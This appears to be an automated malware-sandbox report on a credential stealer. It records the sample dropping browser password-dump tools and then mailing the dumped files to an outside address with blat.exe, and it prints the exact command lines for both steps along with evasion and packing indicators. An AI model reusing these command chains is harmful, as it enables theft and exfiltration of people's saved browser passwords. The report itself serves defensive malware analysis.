              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: gssapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: gssapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: gssapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: Binary string: z:\Projects\VS2005\OperaPassView\Release\OperaPassView.pdb source: OperaPassView.exe, OperaPassView.exe, 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: .pdb?P source: .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, OperaPassView.exe, 00000009.00000000.1722119973.000000000040E000.00000080.00000001.01000000.0000000D.sdmp, OperaPassView.exe.1.dr
              Source: Binary string: z:\Projects\VS2005\iepv\Release\iepv.pdb source: iepv.exe, iepv.exe, 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: z:\Projects\VS2005\PasswordFox\Release\PasswordFox.pdb source: PasswordFox.exe, PasswordFox.exe, 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: z:\Projects\VS2005\ChromePass\Release\ChromePass.pdb source: ChromePass.exe, ChromePass.exe, 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeCode function: 0_2_00401340 LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetEnvironmentVariableA,0_2_00401340
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_00478046 push eax; ret 1_2_00478074
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_0045702F push 8B100241h; iretd 1_2_00457034
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_0045A096 push eax; ret 1_2_0045A0C4
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeCode function: 9_2_0040B9F0 push eax; ret 9_2_0040BA04
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeCode function: 9_2_0040B9F0 push eax; ret 9_2_0040BA2C
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeCode function: 9_2_0040B9BD push ecx; ret 9_2_0040B9CD
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeCode function: 11_2_00416181 push es; ret 11_2_00416183
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeCode function: 11_2_0041658D push ds; ret 11_2_0041658E
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeCode function: 11_2_0040B759 push ecx; ret 11_2_0040B769
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeCode function: 11_2_0040B780 push eax; ret 11_2_0040B794
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeCode function: 11_2_0040B780 push eax; ret 11_2_0040B7BC
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_0040D740 push eax; ret 13_2_0040D754
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_0040D740 push eax; ret 13_2_0040D77C
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_0040D721 push ecx; ret 13_2_0040D731
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_0042B0D9 push ecx; ret 15_2_0042B0E9
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_0042B210 push eax; ret 15_2_0042B224
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_0042B210 push eax; ret 15_2_0042B24C
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_00430644 push eax; ret 15_2_00430649
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 20_2_004123B0 push eax; ret 20_2_004123DE
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 22_2_004123B0 push eax; ret 22_2_004123DE
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: C:\Users\user\AppData\Local\Temp\ .exeFile created: \ .exe
              Source: C:\Users\user\AppData\Local\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeFile created: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\ .exeFile created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\ .exeFile created: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\ .exeFile created: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\ .exeFile created: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\ .exeFile created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeJump to dropped file
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeFile created: C:\Users\user\AppData\Local\Temp\ .exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeCode function: 11_2_0040B251 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_0040B251
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-226
              Uses ping.exe to sleep
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 120 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 120 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeCode function: 0_2_0040144A rdtsc 0_2_0040144A
              Source: C:\Users\user\AppData\Local\Temp\ .exeWindow / User API: threadDelayed 4972Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\600.tmp\blat.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeAPI coverage: 9.5 %
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeAPI coverage: 6.8 %
              Source: C:\Users\user\AppData\Local\Temp\ .exe TID: 7336Thread sleep count: 4972 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exe TID: 7336Thread sleep time: -124300s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8176Thread sleep count: 118 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8176Thread sleep time: -118000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
              Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
              Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
              Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
              Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
              Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
              Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
              Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
              Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
              Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
              Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\ .exeThread sleep count: Count: 4972 delay: -25Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeCode function: 11_2_0040518C FindFirstFileW,FindNextFileW,wcslen,wcslen,11_2_0040518C
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeCode function: 11_2_00404D0E FindFirstFileW,FindNextFileW,FindClose,11_2_00404D0E
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_004063F9 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_004063F9
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_00405798 FindFirstFileW,FindNextFileW,wcslen,wcslen,15_2_00405798
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 20_2_004058AD malloc,ReadFile,strcpy,strrchr,strrchr,strrchr,FindFirstFileA,strcpy,strcat,malloc,malloc,strlen,malloc,memcpy,FindNextFileA,FindClose,20_2_004058AD
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 20_2_0040B976 lstrcpyA,FindFirstFileA,FindClose,20_2_0040B976
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 22_2_004058AD malloc,ReadFile,strcpy,strrchr,strrchr,strrchr,FindFirstFileA,strcpy,strcat,malloc,malloc,strlen,malloc,memcpy,FindNextFileA,FindClose,22_2_004058AD
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 22_2_0040B976 lstrcpyA,FindFirstFileA,FindClose,22_2_0040B976
              Source: blat.exe, 0000001D.00000002.2735034290.0000000000504000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
              Source: blat.exe, 00000016.00000002.2480567758.0000000000558000.00000004.00000020.00020000.00000000.sdmp, blat.exe, 00000019.00000002.2562572459.0000000000714000.00000004.00000020.00020000.00000000.sdmp, blat.exe, 0000001B.00000002.2653078613.0000000000714000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeAPI call chain: ExitProcess graph end nodegraph_0-179
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeAPI call chain: ExitProcess graph end nodegraph_0-205
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeAPI call chain: ExitProcess graph end nodegraph_0-229
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeAPI call chain: ExitProcess graph end nodegraph_0-146
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeAPI call chain: ExitProcess graph end nodegraph_0-231
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeCode function: 0_2_0040144A rdtsc 0_2_0040144A
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeCode function: 0_2_00401340 LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetEnvironmentVariableA,0_2_00401340
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeCode function: 0_2_00401157 mov eax, dword ptr fs:[00000030h]0_2_00401157
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeCode function: 0_2_00401169 mov eax, dword ptr fs:[00000030h]0_2_00401169
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeCode function: 0_2_00401AD8 GetCommandLineA,GetModuleHandleA,GetProcessHeap,ExitProcess,CreateWindowExA,0_2_00401AD8
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_00403B70 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,1_2_00403B70
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_00403CC0 SetUnhandledExceptionFilter,1_2_00403CC0
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeProcess created: C:\Users\user\AppData\Local\Temp\ .exe "C:\Users\user\AppData\Local\Temp\ .exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\600.tmp\ip.bat" "Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe OperaPassView.exe /stext user-PC_OperaPassView.txtJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe PasswordFox.exe /stext user-PC_PasswordFox.txtJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe iepv.exe /stext user-PC_iepv.txtJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe ChromePass.exe /stext user-PC_ChromePass.txtJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 120 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe OperaPassView.exe /stext user-PC_OperaPassView.txtJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -to alexandrKondratiev5@yandex.ru -subject "Opera" -attachi "user-PC_OperaPassView.txt" -body "Opera"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -to alexandrKondratiev5@yandex.ru -subject "Fox" -attachi "user-PC_PasswordFox.txt" -body "Fox"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe ChromePass.exe /stext user-PC_ChromePass.txtJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -to alexandrKondratiev5@yandex.ru -subject "Chrome" -attachi "user-PC_ChromePass.txt" -body "Chrome"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_0040D702 GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,15_2_0040D702
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 20_2_0040A9D8 _EH_prolog,strcmp,strcpy,sprintf,sprintf,strchr,strchr,strcpy,strchr,strchr,rand,rand,rand,strcpy,strcpy,GetLocalTime,GetTimeZoneInformation,sprintf,sprintf,sprintf,sprintf,sprintf,sprintf,sprintf,sprintf,sprintf,sprintf,sprintf,sprintf,GetSystemTimeAsFileTime,GetCurrentProcessId,sprintf,sprintf,sprintf,lstrcmpA,sprintf,memcpy,strcpy,strcpy,strcat,strcpy,strcat,strcmp,sprintf,sprintf,strstr,20_2_0040A9D8
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_00403CD7 GetVersionExA,GetVersionExA,GetVersionExA,1_2_00403CD7
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Chrome Password Stealer
              Source: Yara matchFile source: Process Memory Space: ChromePass.exe PID: 8164, type: MEMORYSTR
              Yara detected Fox Password Stealer
              Source: Yara matchFile source: 11.2.PasswordFox.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PasswordFox.exe PID: 8052, type: MEMORYSTR
              Yara detected Opera Password Stealer
              Source: Yara matchFile source: 9.2.OperaPassView.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: Process Memory Space: OperaPassView.exe PID: 7972, type: MEMORYSTR
              Contains functionality to steal Internet Explorer form passwords
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: Software\Microsoft\Internet Explorer\IntelliForms\Storage213_2_00406B85
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: Software\Microsoft\Internet Explorer\IntelliForms\Storage213_2_00406B3F
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

              Remote Access Functionality

              barindex
              Yara detected Chrome Password Stealer
              Source: Yara matchFile source: Process Memory Space: ChromePass.exe PID: 8164, type: MEMORYSTR
              Yara detected Fox Password Stealer
              Source: Yara matchFile source: 11.2.PasswordFox.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PasswordFox.exe PID: 8052, type: MEMORYSTR
              Yara detected Opera Password Stealer
              Source: Yara matchFile source: 9.2.OperaPassView.exe.400000.0.unpack, type: UNPACKEDPE
